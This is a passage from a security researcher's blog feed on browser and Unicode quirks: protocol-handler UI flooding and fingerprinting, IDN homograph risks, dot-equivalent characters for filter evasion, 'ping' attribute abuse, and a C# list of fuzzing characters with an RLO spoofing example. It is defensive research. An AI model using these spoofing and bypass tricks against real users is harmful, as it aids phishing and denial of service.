src="http://1.bp.blogspot.com/-9qXCvXgCAq0/TybYJmQ-43I/AAAAAAAAAMs/UnBmpqLVlm4/s400/ui-confusion-chrome.JPG" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;The primary spam protection is the infobar and requirement that a user must click 'yes' or 'no' to accept the registration or not.  
The UI could easily be flooded with infobars in Chrome, which tiled them vertically, making the Web page completely unusable after the window filled up, as in the image below.&lt;/p&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-b2yMmLaTb4U/TybYWEbGCAI/AAAAAAAAAM8/5hlppHEbfX4/s1600/chrome-register-protocol-cascade.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="351" width="400" src="http://3.bp.blogspot.com/-b2yMmLaTb4U/TybYWEbGCAI/AAAAAAAAAM8/5hlppHEbfX4/s400/chrome-register-protocol-cascade.png" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;One could also create a really long title, which would overflow the UI so the user would only see one big button, and would likely have little idea about what to do other than click the big button.&lt;/p&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-YjKTu9JdkfU/TybYWcHnkfI/AAAAAAAAANE/ATY97KeYCBM/s1600/chrome-ui-overflow.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="172" width="400" src="http://1.bp.blogspot.com/-YjKTu9JdkfU/TybYWcHnkfI/AAAAAAAAANE/ATY97KeYCBM/s400/chrome-ui-overflow.png" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;Firefox and Opera both at least overlapped the infobars so you would only ever see one at a time.  Closing one would reveal the next one behind it.&lt;/p&gt; &lt;p&gt;It's also interesting to note how the registered protocol handlers would be stored.  Chrome was the only browser that registered handlers at the OS-layer, making them available to all applications.  In Windows this meant storing the registrations in the registry under the &lt;span style="font-family: 'Bitstream Vera Sans Mono', 'Courier New', 'Lucida Console', monospace, fixed;"&gt;HKEY_CLASSES_ROOT&lt;/span&gt; hive, which required administrative elevation to register.  
In Ubuntu, they'd be stored in &lt;span style="font-family: 'Bitstream Vera Sans Mono', 'Courier New', 'Lucida Console', monospace, fixed;"&gt;~/.local/share/applications/mimeapps.list&lt;/span&gt;.  Opera stored registered protocol handlers in &lt;span style="font-family: 'Bitstream Vera Sans Mono', 'Courier New', 'Lucida Console', monospace, fixed;"&gt;C:\Users\chris\AppData\Roaming\Opera\Opera\handlers.ini&lt;/span&gt; where they were only available to Opera, and Firefox took the same approach, storing them in &lt;span style="font-family: 'Bitstream Vera Sans Mono', 'Courier New', 'Lucida Console', monospace, fixed;"&gt;C:\Users\chris\AppData\Roaming\Mozilla\Firefox\Profiles\wj7x1dmj.default\mimeTypes.rdf&lt;/span&gt; where they were actually mapped using the URN protocol.&lt;/p&gt; &lt;p&gt;Here's what a 'mailto' scheme registration looks like stored in Opera's handlers.ini file:&lt;/p&gt;&lt;pre&gt;&lt;br /&gt;[mailto]&lt;br /&gt;Type=Protocol&lt;br /&gt;Handler&lt;br /&gt;Webhandler=http://www.lookout.net/?mail=%s&lt;br /&gt;Description=mailto scheme&lt;br /&gt;Flags=16&lt;br /&gt;&lt;/pre&gt; &lt;p&gt;And here's what some snippets of a 'foobar' scheme registration look like stored in Firefox's mimeTypes.rdf file:&lt;/p&gt;&lt;pre&gt;&lt;br /&gt;&amp;lt;RDF:li RDF:resource=&amp;quot;urn:scheme:foobar&amp;quot;/&amp;gt;&lt;br /&gt;&amp;lt;RDF:Description RDF:about=&amp;quot;urn:handler:web:http://www.lookout.net/foobar=%s&amp;quot;&lt;br /&gt;                 NC:prettyName=&amp;quot;The foobar scheme&amp;quot;&lt;br /&gt;                 NC:uriTemplate=&amp;quot;http://www.lookout.net/foobar=%s&amp;quot; /&amp;gt;&lt;br /&gt;&amp;lt;RDF:Description RDF:about=&amp;quot;urn:scheme:foobar&amp;quot;&lt;br /&gt;                 NC:value=&amp;quot;foobar&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;NC:handlerProp RDF:resource=&amp;quot;urn:scheme:handler:foobar&amp;quot;/&amp;gt;&lt;br /&gt;&amp;lt;RDF:Description 
RDF:about=&amp;quot;urn:scheme:handler:foobar&amp;quot;&lt;br /&gt;                 NC:alwaysAsk=&amp;quot;true&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;NC:possibleApplication RDF:resource=&amp;quot;urn:handler:web:http://www.lookout.net/foobar=%s&amp;quot;/&amp;gt;&lt;br /&gt;&lt;/pre&gt; &lt;h2&gt;Further testing&lt;/h2&gt;&lt;p&gt;I tried clobbering some registration entries in Firefox using certain Unicode characters that would be best-fit mapped to ASCII. Some characters, such as the control characters 0x09 and 0x01, seem like they obviously should not be allowed in a scheme name.  However, tests using these combined with &lt;a href="http://shazzer.co.uk/vector/Characters-allowed-before-protocol-in-js-url"&gt;some Shazzer vectors for characters allowed before the javascript scheme name&lt;/a&gt; did not work.  While registrations such as " javascript" with a leading SPACE were allowed in Firefox, I believe some pre-processing removes the leading character when it is encountered in an href attribute. &lt;/p&gt;&lt;p&gt;As far as penetration testing Web applications goes, we'll want to keep an eye out for usage of navigator.registerProtocolHandler, and closely inspect what the use case and implementation details might be.  For example, it makes sense that GMail or Hotmail would want to register the mailto handler to their URL.  Is that URL dynamically generated and can it be controlled by user input?  If an attacker could, for example, inject the hostname part of the URL then they could cause some mischief, or at the least steal email addresses and other data present in the mailto link.  We'll also want to keep an eye out for registrations of web+foo schemes for similar issues including data exfiltration and URL control.  I'm sure other folks can think of more threats and abuse cases; if so, please let me know!  
Otherwise, time will tell.&lt;/p&gt; &lt;h2&gt;Risks to user-tracking and fingerprinting&lt;/h2&gt;&lt;p&gt;Another threat to consider is the way the web+ prefix would allow sites to set persistent unique identifiers in a user's Web browser.   This issue was brought up by James Hawkins, an author of the &lt;a href="http://dvcs.w3.org/hg/web-intents/raw-file/tip/spec/Overview.html"&gt;Web Intents draft&lt;/a&gt;, on the &lt;a href="http://lists.whatwg.org/htdig.cgi/whatwg-whatwg.org/2012-February/034881.html"&gt;WHATWG mailing list&lt;/a&gt;.  It also became evident to me during testing when I realized I could set a unique identifier through the web+ protocol scheme - something like web+[some_unique_id].  Sites (from any origin) could later use isProtocolHandlerRegistered(scheme, url) to identify their visitors, and even track their movement across the Web.  As we've seen with trickery employed by advertising agencies in the past, those unique ids could be bundled and shared.  However, the isProtocolHandlerRegistered API was not implemented in the browsers at the time of testing, so I could not confirm this. 
&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-507807102126684043?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2012/01/testing-registerprotocolhandler-and-web.html</link><author>noreply@blogger.com (Chris Weber)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-vqCAdpUphYc/TybYGiQKbrI/AAAAAAAAAMY/ritoua3mU14/s72-c/ui-confusion-opera.JPG' height='72' width='72'/><thr:total>0</thr:total><georss:featurename>Seattle, WA, USA</georss:featurename><georss:point>47.6062095 -122.3320708</georss:point><georss:box>47.520564 -122.4899993 47.691855 -122.1741423</georss:box></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-8716162821976944404</guid><pubDate>Fri, 08 Jul 2011 12:01:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.932-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>IDN</category><category domain='http://www.blogger.com/atom/ns#'>URI</category><category domain='http://www.blogger.com/atom/ns#'>IDNA</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>IDNA2003, IDNA2008, domain and sub-domain registrations during the
transitional period</title><description>To continue on with the discussion about &lt;a href="http://www.lookout.net/2011/06/30/the-risks-of-using-eszett-or-sharp-s-s-in-domain-names/"&gt;THE RISKS OF USING “ESZETT” OR “SHARP S” (“SS”) IN DOMAIN NAME&lt;/a&gt; - this character is just one of four deviation characters that will certainly cause mischief and mayhem in the coming years.  Here's the deal: the registries and registrars are moving away from the initial specification that allowed Internationalized Domain Names (IDN) to be registered.  It was called IDNA and is now referred to as IDNA2003.  They're moving to the new specification, called IDNA2008, although it didn't officially become a standard until the year 2010.  Hang with me, this may actually affect you, whether you're a registry like DENIC, a browser like Internet Explorer, a second-level registry like tumblr.com, or simply a customer who wants a domain name.&lt;br/&gt;&lt;br/&gt;There's a problem with these two specs - they're incompatible, and most of the risk here will be found during the "transitional period" when registries are upgrading.  The incompatibility is on purpose, mind you, and was deemed to be the best choice for the decades ahead of us.  Eventually we want to completely get rid of IDNA2003 and get the whole world on IDNA2008 - registries, Web browsers, anything that processes IDNs.&lt;br/&gt;&lt;br/&gt;A lot of characters will be handled differently under the new rules of IDNA2008.  Four characters in particular, called the &lt;a href="http://www.unicode.org/reports/tr46/#Deviations"&gt;deviation characters&lt;/a&gt;, are poised to cause mayhem during the transitional period as domain name registries shift to IDNA2008.  Why?  
Because for a period of time domain names using these characters may actually resolve to two different IP addresses - depending on which IDNA rules the client/Web browser has implemented.&lt;br/&gt;&lt;br/&gt;But  just what is a &lt;a href="http://en.wikipedia.org/wiki/Domain_name_registry"&gt;domain name registry&lt;/a&gt; anyway?  To keep it simple, we can think of a registry as the overarching authority for a top-level-domain (TLD).  Most TLDs are well-known like .com, .net, and .org, and each has a single registry that enforces some rules and manages all domain name records.  This also ensures the same domain name can't be registered by more than one party.  Registrars on the other hand are sort of resellers, like Godaddy, Enom, and Dyndns who will sell the domain names to customers.  They still need to comply with the rules of the registry.&lt;br/&gt;&lt;br/&gt;But we can also think of some domains as their own second-level registries.  For example, blogspot.com, tumblr.com, smugmug.com each have millions of customers with their own domain name like &lt;a href="http://google.blogspot.com/"&gt;http://google.blogspot.com/&lt;/a&gt;.  In this way they're acting as registries providing subdomains, one per customer.  
So all of these second-level registries will also be affected by IDNA's transitional period, if they decide to even offer IDNs in their subdomains - most don't currently.&lt;br/&gt;&lt;br/&gt;The four deviation characters are of particular concern, so named because they are handled differently under IDNA2003 rules than under IDNA2008 rules:&lt;br/&gt;&lt;ul&gt;&lt;br/&gt;	&lt;li&gt;U+200C ZERO WIDTH NON-JOINER&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;U+200D ZERO WIDTH JOINER&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;U+00DF ( ß ) LATIN SMALL LETTER SHARP S&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;U+03C2 ( ς ) GREEK SMALL LETTER FINAL SIGMA&lt;/li&gt;&lt;br/&gt;&lt;/ul&gt;&lt;br/&gt;The two JOINERs get dropped under IDNA2003 but are valid in IDNA2008 under certain language contexts.  The "ß" maps to "ss" under IDNA2003 but does not map under IDNA2008, and the "ς" maps to "σ" under IDNA2003 but does not map under IDNA2008.   For a good visual of this &lt;a href="http://www.unicode.org/reports/tr46/#Deviations"&gt;see Table 1 of UTS46&lt;/a&gt;.&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;What does it all mean?&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;In the end, if you currently have a domain containing "ss" or "σ" then you may want to register the domain using the new character supported under IDNA2008 if it suits your market.  That's not to say you should by any means; for example, "&lt;a href="http://ssa.gov"&gt;ssa.gov&lt;/a&gt;" probably does not care to register "&lt;a href="http://ßa.gov"&gt;ßa.gov&lt;/a&gt;" since its market is the United States.  
But a German bank named "Gießen Savings and Loan" that currently owns &lt;a href="http://www.sparkasse-giessen.de"&gt;http://www.sparkasse-giessen.de&lt;/a&gt; will certainly want to register &lt;a href="http://www.sparkasse-gießen.de"&gt;http://www.sparkasse-gießen.de&lt;/a&gt;.&lt;br/&gt;&lt;br/&gt;As for the JOINERs, that's a whole other story, but legitimate registrations should only be allowed for certain sequences of Arabic or Indic characters.  The use cases are limited to those, and registries will be required to implement those restrictions.  However, clients who perform IDNA2008 lookups are not required to implement those restrictions.&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;Is my registry IDNA2008 enabled?&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;I don't know, but I'd suggest checking with them.  DENIC decided not to implement the &lt;a href="http://www.unicode.org/reports/tr46/#Registries"&gt;bundling or blocking recommendations&lt;/a&gt; and instead gave their customers about 3 weeks to register the alternate domain that would resolve to them normally under IDNA2003 but not under IDNA2008.  That seems like a short period of time to me; if you were on vacation you might have missed the chance.  But the choice is up to the registry.  
So check with your registrar or the registry to find out where they're at with their upgrade plans.&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-8716162821976944404?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/07/idna2003-idna2008-domain-and-sub-domain.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-5662752881732653943</guid><pubDate>Thu, 30 Jun 2011 13:31:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.807-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>IDN</category><category domain='http://www.blogger.com/atom/ns#'>URI</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>The risks of using "Eszett" or "sharp s" ("ß") in domain names</title><description>With the transition from IDNA2003 to IDNA2008, there will be four characters that deviate in how they're handled.  This means that a domain name containing one of these characters may resolve to a different IP address under the rules of IDNA2003 than it does under the rules of IDNA2008.  One such character is the Latin small letter sharp s – also known as "Eszett" or "sharp s" ("ß") with code point U+00DF.  Registries have been advised to &lt;a href="http://unicode.org/reports/tr46/#Registries"&gt;implement bundling and blocking rules&lt;/a&gt; that would protect the registrants of domains with the character "ß" in them.  This would mean that an owner of &lt;a href="http://straße.de"&gt;http://straße.de&lt;/a&gt; would also be the guaranteed owner of &lt;a href="http://strasse.de"&gt;http://strasse.de&lt;/a&gt;.  
However, some registries such as &lt;a href="http://www.denic.de/en/domains/internationalized-domain-names/sharp-s.html"&gt;DENIC&lt;/a&gt; are not implementing these measures as they move to IDNA2008.&lt;br/&gt;&lt;br/&gt;This means that when Alice goes to visit &lt;a href="http://straße.de"&gt;http://straße.de&lt;/a&gt; in her favorite browser that implements IDNA2008 she'll be taken to the domain she expects.  But when she visits the site at her friend Bob's house, using his browser that implements IDNA2003, she'll be taken to &lt;a href="http://strasse.de"&gt;http://strasse.de&lt;/a&gt; which could be a spoofing site.  In a scenario such as online banking this becomes a big deal.  And we can't possibly expect Alice and Bob to be aware of these incompatibilities, can we?  Time will tell.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-5662752881732653943?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/06/risks-of-using-or-s-in-domain-names.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-6147567918689742406</guid><pubDate>Tue, 28 Jun 2011 21:46:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.826-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>phishing</category><category domain='http://www.blogger.com/atom/ns#'>malware</category><category domain='http://www.blogger.com/atom/ns#'>security</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Many stops equal a U+002E full stop</title><description>In IDNA-aware (&lt;a href="http://tools.ietf.org/html/rfc3490#section-3.1"&gt;IDNA2003&lt;/a&gt;) applications, the "dot" character we see in domain names like www.example.com has several equivalents.  
Specifically, the following characters are all equivalent under IDNA rules:&lt;br/&gt;&lt;pre&gt;U+002E (full stop)&lt;br/&gt;U+3002 (ideographic full stop)&lt;br/&gt;U+FF0E (fullwidth full stop)&lt;br/&gt;U+FF61 (halfwidth ideographic full stop)&lt;/pre&gt;&lt;br/&gt;So the following Unicode strings are valid domain names and hyperlinks.  Note that what you see on the surface of the page content is what's in the anchor tag's href attribute.  By the time you hover your mouse over the link and even click it, the IDN-aware Web browser will have already normalized all the dot-equivalents to the U+002E full stop.  To see the test case, either copy the hyperlink using your browser's context menu (e.g. right click) or view the source of the page.&lt;br/&gt;&lt;pre&gt;&lt;a href="http://www.example.com"&gt;www.example.com&lt;/a&gt; U+002E (full stop)&lt;br/&gt;&lt;a href="http://www。example。com"&gt;www。example。com&lt;/a&gt; U+3002 (ideographic full stop)&lt;br/&gt;&lt;a href="http://www．example．com"&gt;www．example．com&lt;/a&gt; U+FF0E (fullwidth full stop)&lt;br/&gt;&lt;a href="http://www｡example｡com"&gt;www｡example｡com&lt;/a&gt; U+FF61 (halfwidth ideographic full stop)&lt;/pre&gt;&lt;br/&gt;There are actually a couple more bonus characters that equate to U+002E according to additional mapping rules:&lt;br/&gt;&lt;pre&gt;&lt;a href="http://www․example․com"&gt;www․example․com&lt;/a&gt; U+2024 (one dot leader)&lt;br/&gt;&lt;a href="http://www﹒example﹒com"&gt;www﹒example﹒com&lt;/a&gt; U+FE52 (small full stop)&lt;/pre&gt;&lt;br/&gt;Are there any IDNA-aware WAFs out there?  
Has anyone seen this employed to bypass spam or phishing filters?&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-6147567918689742406?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/06/many-stops-equal-u002e-full-stop.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-2248016385171500638</guid><pubDate>Wed, 22 Jun 2011 13:57:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.624-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>ping</category><category domain='http://www.blogger.com/atom/ns#'>security</category><category domain='http://www.blogger.com/atom/ns#'>HTML</category><title>Abusing hyperlink auditing and the "ping" attribute in HTML</title><description>I just learned about this proposed feature of HTML which, as &lt;a href="http://annevankesteren.nl/ "&gt;Anne van Kesteren&lt;/a&gt; noted, is not in HTML5 at the moment but might be in HTML6.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.whatwg.org/specs/web-apps/current-work/multipage/links.html#hyperlink-auditing"&gt;http://www.whatwg.org/specs/web-apps/current-work/multipage/links.html#hyperlink-auditing&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;So "a" and "area" elements would support a "ping" attribute as a space-separated list of URIs that should be contacted when the hyperlink is activated.  When someone clicks on the link, each of the URIs in the "ping" attribute would receive an HTTP POST with the string "PING" in the body.  The request must also include either a "Referrer" header or a new "Ping-From" header which would include the same value.  
This can obviously be useful for tracking purposes, and hopefully third-party sites could be easily (and by default) blocked rather than having an option to "selectively ignore URLs in the list (e.g. ignoring any third-party URLs)".&lt;br/&gt;&lt;br/&gt;I can imagine some other abuse cases here around flooding - e.g. the URL could easily be appended with junk, causing large HTTP requests to get sent to an inordinately large list of URIs.&lt;br/&gt;&lt;br/&gt;Information could be leaked in the usual sense of Referrer/Ping-From leaks.  Anything else come to mind?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-2248016385171500638?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/06/abusing-hyperlink-auditing-and.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-3585185166237218636</guid><pubDate>Mon, 20 Jun 2011 19:41:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.693-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>URI</category><title>Some browsers convert pipe "|" to colon ":" in the file scheme</title><description>I just thought this was odd, and it may be exploitable in cases where a security filter checks the string before the conversion takes place.&lt;br/&gt;&lt;br/&gt;Here are the results of the DOM parsing for &lt;a href="file://c|/foo/bar"&gt;"file://c|/foo/bar"&lt;/a&gt;.  Internet Explorer and Google Chrome both convert the "|" to the ":" in the path component.  
&lt;a href="http://en.wikipedia.org/wiki/File_protocol#Windows_2"&gt;Windows actually treats the "|" as a ":" in the path&lt;/a&gt;, which may also seem odd, but then why would these browsers feel the need to convert the character?&lt;br/&gt;&lt;br/&gt;Test Case&lt;br/&gt;================&lt;br/&gt;&lt;br/&gt;&lt;a href="file://c|/foo/bar"&gt;file://c|/foo/bar&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&lt;br/&gt;&lt;br/&gt;Results&lt;br/&gt;================&lt;br/&gt;&lt;br/&gt;&lt;em&gt;&lt;strong&gt;RawUrl                                           Browser &lt;/strong&gt;&lt;/em&gt;&lt;br/&gt;file:///c:/foo/bar                        MSIE 7.0&lt;br/&gt;file:///C:/foo/bar                       Chrome/12.0.742.100&lt;br/&gt;file:///c|/foo/bar                       Firefox/4.0.1&lt;br/&gt;file://c|/foo/bar                         Safari/5.05&lt;br/&gt;file://localhost/c|/foo/bar    Opera/9.80&lt;br/&gt;&lt;br/&gt;I can understand being liberal in accepting "|" characters in the path  segment, even though RFC3986 and 3987bis would have you percent-encode it  to "%7C".  
But I didn't realize that IE and Chrome would actually  perform a transformation on the input in this way.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-3585185166237218636?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/06/some-browsers-convert-pipe-to-colon-in.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>5</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-2968082149280318858</guid><pubDate>Thu, 02 Jun 2011 23:00:00 +0000</pubDate><atom:updated>2012-02-20T16:36:10.901-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>BOM</category><category domain='http://www.blogger.com/atom/ns#'>RLO</category><category domain='http://www.blogger.com/atom/ns#'>testing</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Special Unicode characters for testing, fuzzing, and controlling the visual display of text</title><description>&lt;strong&gt;WARNING&lt;/strong&gt;: Some of these characters may cause strange things to happen in your software.&lt;br/&gt;&lt;br/&gt;Of course, that's the point, right?  Here's a minimal set of special Unicode characters I like to use in application testing.  
This bit is from a small Unicode generation library I use for fetching things like:&lt;br/&gt;&lt;ul&gt;&lt;br/&gt; &lt;li&gt;best fit mappings&lt;/li&gt;&lt;br/&gt; &lt;li&gt;Unicode normalization mappings&lt;/li&gt;&lt;br/&gt; &lt;li&gt;ill-formed byte sequences&lt;/li&gt;&lt;br/&gt; &lt;li&gt;overlong-utf8&lt;/li&gt;&lt;br/&gt; &lt;li&gt;non-characters&lt;/li&gt;&lt;br/&gt; &lt;li&gt;private use area (PUA)&lt;/li&gt;&lt;br/&gt; &lt;li&gt;unassigned code points&lt;/li&gt;&lt;br/&gt; &lt;li&gt;code points with special meaning such as the BOM and RLO&lt;/li&gt;&lt;br/&gt; &lt;li&gt;half-surrogate values&lt;/li&gt;&lt;br/&gt; &lt;li&gt;invisible characters&lt;/li&gt;&lt;br/&gt;&lt;/ul&gt;&lt;br/&gt;Some of these (the RLO and MVS) are useful for visual spoofing or controlling the visual appearance of text in modal dialog boxes or other user-controlled content.  For example, throw the RLO character in the middle of a string to switch the reading order so the characters run right-to-left.  Like so:&lt;br/&gt;&lt;br/&gt;The site www.example.com‮‮ is known to host malware, continue?&lt;br/&gt;&lt;br/&gt;A lame example, I know, but the point is that as a software developer you should never let the override characters into your code.  Other characters have caused weird (often exploitable) errors in Web applications, Web browsers, Web servers and other software I've come across.  
For example, if an ASP.NET application is passing user-controlled input to a StreamWriter, it will enter an irrecoverable error condition leading to a permanent (until restarted) &lt;a href="http://blogs.msdn.com/bclteam/archive/2005/03/15/396389.aspx"&gt;denial of service when an illegal surrogate&lt;/a&gt; (a single low surrogate without a matching high or vice versa) is encountered.&lt;br/&gt;&lt;br/&gt;&lt;code&gt; /// The Byte Order Mark U+FEFF is a special character defining the byte order and endianness&lt;br/&gt;/// of text data.&lt;br/&gt;/// &lt;/code&gt;&lt;code&gt;&lt;br/&gt;public static readonly string uBOM = "\uFEFF";&lt;br/&gt;///&lt;br/&gt;/// The Right to Left Override U+202E defines special meaning to re-order the&lt;br/&gt;/// display of text for right-to-left reading.&lt;br/&gt;///&lt;br/&gt;public static readonly string uRLO = "\u202E";&lt;br/&gt;///&lt;br/&gt;/// Mongolian Vowel Separator U+180E is invisible and has the whitespace property.&lt;br/&gt;///&lt;br/&gt;public static readonly string uMVS = "\u180E";&lt;br/&gt;///&lt;br/&gt;/// Word Joiner U+2060 is an invisible zero-width character.&lt;br/&gt;///&lt;br/&gt;public static readonly string uWordJoiner = "\u2060";&lt;br/&gt;///&lt;br/&gt;/// A reserved code point U+FEFE&lt;br/&gt;///&lt;br/&gt;public static readonly string uReservedCodePoint = "\uFEFE";&lt;br/&gt;///&lt;br/&gt;/// The code point U+FFFF is guaranteed to not be a Unicode character at all&lt;br/&gt;///&lt;br/&gt;public static readonly string uNotACharacter = "\uFFFF";&lt;br/&gt;///&lt;br/&gt;/// An unassigned code point U+0FED&lt;br/&gt;///&lt;br/&gt;public static readonly string uUnassigned = "\u0FED";&lt;br/&gt;///&lt;br/&gt;///  An illegal low half-surrogate U+DEAD&lt;br/&gt;///&lt;br/&gt;public static readonly string uDEAD = "\uDEAD";&lt;br/&gt;///&lt;br/&gt;/// An illegal high half-surrogate U+DAAD&lt;br/&gt;///&lt;br/&gt;public static readonly string uDAAD = "\uDAAD";&lt;br/&gt;///&lt;br/&gt;/// A Private Use Area code 
point U+F8FF which Apple happens to use for its logo.&lt;br/&gt;///&lt;br/&gt;public static readonly string uPrivate = "\uF8FF";&lt;br/&gt;///&lt;br/&gt;/// U+FF0F FULLWIDTH SOLIDUS should normalize to / in a hostname&lt;br/&gt;///&lt;br/&gt;public static readonly string uFullwidthSolidus = "\uFF0F";&lt;br/&gt;///&lt;br/&gt;/// Code point with a numerical mapping and value U+1D7D6 MATHEMATICAL BOLD DIGIT EIGHT&lt;br/&gt;///&lt;br/&gt;public static readonly string uBoldEight = char.ConvertFromUtf32(0x1D7D6);&lt;br/&gt;///&lt;br/&gt;/// IDNA2003/2008 Deviant - U+00DF normalizes to "ss" during IDNA2003's mapping phase,&lt;br/&gt;/// different from its IDNA2008 mapping.&lt;br/&gt;/// See http://www.unicode.org/reports/tr46/&lt;br/&gt;///&lt;br/&gt;public static readonly string uIdnaSs = "\u00DF";&lt;br/&gt;///&lt;br/&gt;/// U+FDFA expands by 11x (UTF-8) and 18x (UTF-16) under NFKC/NFKD&lt;br/&gt;///&lt;br/&gt;public static readonly string uFDFA = "\uFDFA";&lt;br/&gt;///&lt;br/&gt;/// U+0390 expands by 3x (UTF-8) under NFD&lt;br/&gt;///&lt;br/&gt;public static readonly string u0390 = "\u0390";&lt;br/&gt;///&lt;br/&gt;/// U+1F82 expands by 4x (UTF-16) under NFD&lt;br/&gt;///&lt;br/&gt;public static readonly string u1F82 = "\u1F82";&lt;br/&gt;///&lt;br/&gt;/// U+FB2C expands by 3x (UTF-16) under NFC&lt;br/&gt;///&lt;br/&gt;public static readonly string uFB2C = "\uFB2C";&lt;br/&gt;///&lt;br/&gt;/// U+1D160 expands by 3x (UTF-8) under NFC&lt;br/&gt;///&lt;br/&gt;public static readonly string u1D160 = char.ConvertFromUtf32(0x1D160);&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-2968082149280318858?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/06/special-unicode-characters-for-error.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid 
isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-3606848082126858505</guid><pubDate>Fri, 27 May 2011 23:15:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.697-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Web</category><category domain='http://www.blogger.com/atom/ns#'>SSL</category><category domain='http://www.blogger.com/atom/ns#'>TLS</category><category domain='http://www.blogger.com/atom/ns#'>security</category><title>How Web browsers display a standard SSL connection compared with an
EVSSL connection</title><description>Secure Sockets Layer (SSL) is a peer to peer (or client to server) communication protocol designed to encrypt the data being transmitted between two computers over the Internet.  This protects the data from "man-in-the-middle" attacks where a third computer could eavesdrop on the conversation and not only read the data but also modify it in transit.  SSL is certainly one of the earliest security protections added to Web browsers and after several revisions has led to its successor, the Transport Layer Security (TLS) protocol.  To use SSL, a webmaster must purchase a certificate from a Certificate Authority and install it on their Web server.  When visiting the site, a Web browser will read the server's certificate and use its key information to set up an encrypted connection between the browser and the server.&lt;br/&gt;&lt;br/&gt;Each of the most popular modern Web browsers notifies end users that SSL is active through the use of special icons, colors, or other visual notifiers added to the browser chrome that make it clear something good is happening.  In fact the display is quite different depending on the *type* of SSL certificate purchased and used on the site.  The prominent Extended Validation (EVSSL) certificate obviously gets the best branding currently.  Use of an EVSSL certificate will often be presented with colorful green indicators in the Web browser, a sure sign that something even better is happening, right?&lt;br/&gt;&lt;br/&gt;Unfortunately each browser presents this information in a different and sometimes confusing way.  To add to the fragmentation, many browsers have a history of changing even their own presentation habits for SSL.  Perhaps that factor is just a product evolution from years of user feedback and 